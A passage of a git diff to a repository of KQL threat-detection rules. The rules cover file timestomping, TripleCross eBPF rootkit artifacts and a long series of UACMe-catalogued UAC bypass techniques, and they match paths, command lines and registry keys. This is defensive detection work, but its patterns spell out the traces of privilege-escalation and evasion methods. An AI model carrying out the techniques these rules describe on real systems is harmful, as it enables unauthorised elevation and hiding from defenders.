@Joseliyo_Jstnk +// Date: 2023-01-11 +// Level: medium +// Description: Detects usage of the "touch" process in service file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.006 +// False Positives: +// - Admin changing date of files. + +DeviceProcessEvents | where ProcessCommandLine contains " -t " and ProcessCommandLine endswith ".service" and FolderPath endswith "/touch" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql index ba212f6e..38fa4642 100644 --- a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql +++ b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql @@ -1,12 +1,12 @@ -// Title: Triple Cross eBPF Rootkit Default LockFile -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-05 -// Level: high -// Description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Triple Cross eBPF Rootkit Default LockFile +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-05 +// Level: high +// Description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath =~ "/tmp/rootlog" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql index 5819904a..a95a5a35 100644 --- a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql +++ b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql @@ -1,12 +1,12 @@ -// Title: Triple Cross eBPF Rootkit Execve Hijack -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-05 -// Level: high -// Description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Triple Cross eBPF Rootkit Execve Hijack +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-05 +// Level: high +// Description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "execve_hijack" and FolderPath endswith "/sudo" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql index 052ac224..bc47c39c 100644 --- a/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql +++ b/KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql @@ -1,12 +1,12 @@ -// Title: Triple Cross eBPF Rootkit Install Commands -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-05 -// Level: high -// Description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1014 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Triple Cross eBPF Rootkit Install Commands +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-05 +// Level: high +// Description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1014 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " qdisc " or ProcessCommandLine contains " filter ") and (ProcessCommandLine contains " tc " and ProcessCommandLine contains " enp0s3 ") and FolderPath endswith "/sudo" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql index 3a60172f..91f5299e 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Abusing Winsat Path Parsing - File -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceFileEvents +// Title: UAC Bypass Abusing Winsat Path Parsing - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents | where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql index 237dc504..6830eaf5 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Abusing Winsat Path Parsing - Process -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass Abusing Winsat Path Parsing - Process +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql index c63c2b85..a6fca729 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Abusing Winsat Path Parsing - Registry -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceRegistryEvents +// Title: UAC Bypass Abusing Winsat Path Parsing - Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceRegistryEvents | where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains "\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql b/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql index 1f5f92b5..50fe22f4 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Tools Using ComputerDefaults -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-31 -// Level: high -// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass Tools Using ComputerDefaults +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-31 +// Level: high +// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql b/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql index 35ea1430..ef418a7b 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using ChangePK and SLUI -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-23 -// Level: high -// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass Using ChangePK and SLUI +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\slui.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql index 266f342a..b1d43d9e 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using Consent and Comctl32 - File -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-23 -// Level: high -// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceFileEvents +// Title: UAC Bypass Using Consent and Comctl32 - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents | where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql index 39b6db8d..1fd6ae70 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_process.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using Consent and Comctl32 - Process -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-23 -// Level: high -// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass Using Consent and Comctl32 - Process +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\consent.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql b/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql index 8dc93f97..38b2f383 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using Disk Cleanup -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-30 -// Level: high -// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass Using Disk Cleanup +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql b/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql index e650ff3c..183dc613 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using DismHost -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-30 -// Level: high -// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass Using DismHost +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql b/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql index de4e7f10..782dcbbd 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using Event Viewer RecentViews -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-11-22 -// Level: high -// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation - -DeviceProcessEvents +// Title: UAC Bypass Using Event Viewer RecentViews +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-11-22 +// Level: high +// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation + +DeviceProcessEvents | where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql b/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql index 881fc302..7b2d47c9 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using EventVwr -// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems) -// Date: 2022-04-27 -// Level: high -// Description: Detects the pattern of a UAC bypass using Windows Event Viewer -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation - -DeviceFileEvents +// Title: UAC Bypass Using EventVwr +// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems) +// Date: 2022-04-27 +// Level: high +// Description: Detects the pattern of a UAC bypass using Windows Event Viewer +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation + +DeviceFileEvents | where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql index 58e853ed..c451bb97 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using IEInstal - File -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-30 -// Level: high -// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceFileEvents +// Title: UAC Bypass Using IEInstal - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents | where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql index b753c6eb..1f5ee56e 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using IEInstal - Process -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-30 -// Level: high -// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass Using IEInstal - Process +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql b/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql index 1f1e1bca..34e30f70 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using Iscsicpl - ImageLoad -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-17 -// Level: high -// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH% -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceImageLoadEvents +// Title: UAC Bypass Using Iscsicpl - ImageLoad +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-17 +// Level: high +// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH% +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceImageLoadEvents | where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql index 5584d8b8..71051fa8 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using MSConfig Token Modification - File -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceFileEvents +// Title: UAC Bypass Using MSConfig Token Modification - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents | where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql index b775b5fa..7e9d4006 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using MSConfig Token Modification - Process -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass Using MSConfig Token Modification - Process +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql b/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql index f206c78d..52251d21 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using .NET Code Profiler on MMC -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-30 -// Level: high -// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceFileEvents +// Title: UAC Bypass Using .NET Code Profiler on MMC +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents | where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql index d728f4ad..e2bef7cb 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using NTFS Reparse Point - File -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-30 -// Level: high -// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceFileEvents +// Title: UAC Bypass Using NTFS Reparse Point - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents | where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql index 0b5ad53c..a1dc464d 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql +++ b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using NTFS Reparse Point - Process -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-08-30 -// Level: high -// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass Using NTFS Reparse Point - Process +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\" /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql b/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql index 049383b1..07e62c6d 100644 --- a/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql +++ 